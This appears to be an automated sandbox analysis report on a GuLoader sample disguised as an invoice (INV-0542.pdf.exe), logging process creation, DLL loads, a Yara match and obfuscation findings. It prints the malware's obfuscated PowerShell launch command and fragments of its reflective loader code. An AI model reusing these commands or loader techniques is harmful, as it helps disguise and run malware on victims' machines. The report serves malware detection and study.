Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

File read: C:\Users\user\Desktop\INV-0542.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INV-0542.pdf.exe "C:\Users\user\Desktop\INV-0542.pdf.exe"
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: fontext.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: fms.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: INV-0542.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2417683631.0000000006F63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2420884473.00000000081A2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Forspildtes $Rhyparographer $Staalhjelms), (Ragedes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flyuheld = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Moneylending)), $Defector).DefineDynamicModule($Ddmandsknaps, $false).DefineType($Feriekoloniernes, $juvelbelgnings, [System.Multicast

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_072B0FC4 push es; iretd	2_2_072B0FC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_003948F1 push eax; ret	5_2_003948F2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394927 push eax; ret	5_2_00394932
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_0039891E pushad ; iretd	5_2_0039891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394911 push eax; ret	5_2_00394912
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394917 push eax; ret	5_2_00394922
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394977 push eax; ret	5_2_00394982
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_0039496D push eax; ret	5_2_00394972
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_0039495A push eax; ret	5_2_00394962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394998 push eax; ret	5_2_003949A2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00394987 push eax; ret	5_2_00394992

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: INV-0542.pdf.exe

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
